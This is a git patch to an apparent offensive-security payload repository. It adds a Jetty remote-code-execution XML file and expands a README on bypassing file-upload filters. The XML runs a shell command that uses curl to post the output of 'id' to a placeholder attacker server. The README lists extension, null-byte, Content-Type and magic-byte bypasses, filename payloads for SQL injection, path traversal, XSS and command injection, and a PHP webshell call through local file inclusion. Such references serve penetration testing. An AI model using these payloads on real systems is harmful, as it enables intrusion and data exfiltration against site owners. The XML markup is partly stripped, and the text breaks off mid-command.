From fa849c00f234b3972aaa35622846ab50e97573ab Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 9 Aug 2022 22:05:45 +0200 Subject: [PATCH] Jetty RCE + Upload tricks --- .../Jetty RCE/JettyShell.xml | 15 ++++++ Upload Insecure Files/README.md | 54 ++++++++++++++----- 2 files changed, 55 insertions(+), 14 deletions(-) create mode 100644 Upload Insecure Files/Jetty RCE/JettyShell.xml diff --git a/Upload Insecure Files/Jetty RCE/JettyShell.xml b/Upload Insecure Files/Jetty RCE/JettyShell.xml new file mode 100644 index 0000000..769376c --- /dev/null +++ b/Upload Insecure Files/Jetty RCE/JettyShell.xml @@ -0,0 +1,15 @@ + + + + + + + + /bin/sh + -c + curl -F "r=`id`" http://yourServer:1337/ + + + + + \ No newline at end of file diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index a6b11a9..3f5bfba 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -14,6 +14,7 @@ * [CVE - Image Tragik](#cve---image-tragik) * [CVE - FFMpeg](#cve---ffmpeg) * [ZIP Archive](#zip-archive) + * [Jetty RCE](#jetty-rce) * [References](#references) @@ -44,14 +45,22 @@ .phtm .inc ``` -* ASP Server : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0), shell.soap` -* JSP : `.jsp, .jspx, .jsw, .jsv, .jspf` +* ASP Server + ```powershell + .asp + .aspx + .config + .cer and .asa # (IIS <= 7.5) + shell.aspx;1.jpg # (IIS < 7.0) + shell.soap + ``` +* JSP : `.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action`s * Perl: `.pl, .pm, .cgi, .lib` * Coldfusion: `.cfm, .cfml, .cfc, .dbm` ### Upload tricks -- Use double extensions : `.jpg.php` +- Use double extensions : `.jpg.php, .png.php5` - Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg` - Random uppercase and lowercase : `.pHp, .pHP5, .PhAr` - Null byte (works well against `pathinfo()`) @@ -63,7 +72,10 @@ * `.php\x00.jpg` - Special characters * Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed. - * Whitespace characters: `file.php%20`, `file.php%0d%0a.jpg` + * Whitespace and new line characters + * `file.php%20` + * `file.php%0d%0a.jpg` + * `file.php%0a` * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`. * Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp` * Multiple special characters: `file.jsp/././././.` @@ -71,6 +83,7 @@ * `Content-Type : image/gif` * `Content-Type : image/png` * `Content-Type : image/jpeg` + * Content-Type wordlist: [SecLists/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt) * Set the Content-Type twice: once for unallowed type and once for allowed. - [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures) * Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application. @@ -82,15 +95,21 @@ ### Filename vulnerabilities +Sometimes the vulnerability is not the upload but how the file is handled after. You might want to upload files with payloads in the filename. + - Time-Based SQLi Payloads: e.g. `poc.js'(select*from(select(sleep(20)))a)+'.extension` -- LFI Payloads: e.g. `image.png../../../../../../../etc/passwd` +- LFI/Path Traversal Payloads: e.g. `image.png../../../../../../../etc/passwd` - XSS Payloads e.g. `'">.extension` - File Traversal e.g. `../../../tmp/lol.png` - Command Injection e.g. `; sleep 10;` +Also you upload: +- HTML/SVG files to trigger an XSS +- EICAR file to check the presence of an antivirus + ### Picture upload with LFI -Valid pictures hosting PHP code. Upload the picture and use a local file inclusion to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`. +Valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`. - Picture Metadata, hide the payload inside a comment tag in the metadata. - Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating `getimagesize()` and `imagecreatefromgif()`. @@ -102,19 +121,20 @@ Create a custom picture and insert exif tag with `exiftool`. A list of multiple ```ps1 convert -size 110x110 xc:white payload.jpg exiftool -Copyright="PayloadsAllTheThings" -Artist="Pentest" -ImageUniqueID="Example" payload.jpg +exiftool -Comment="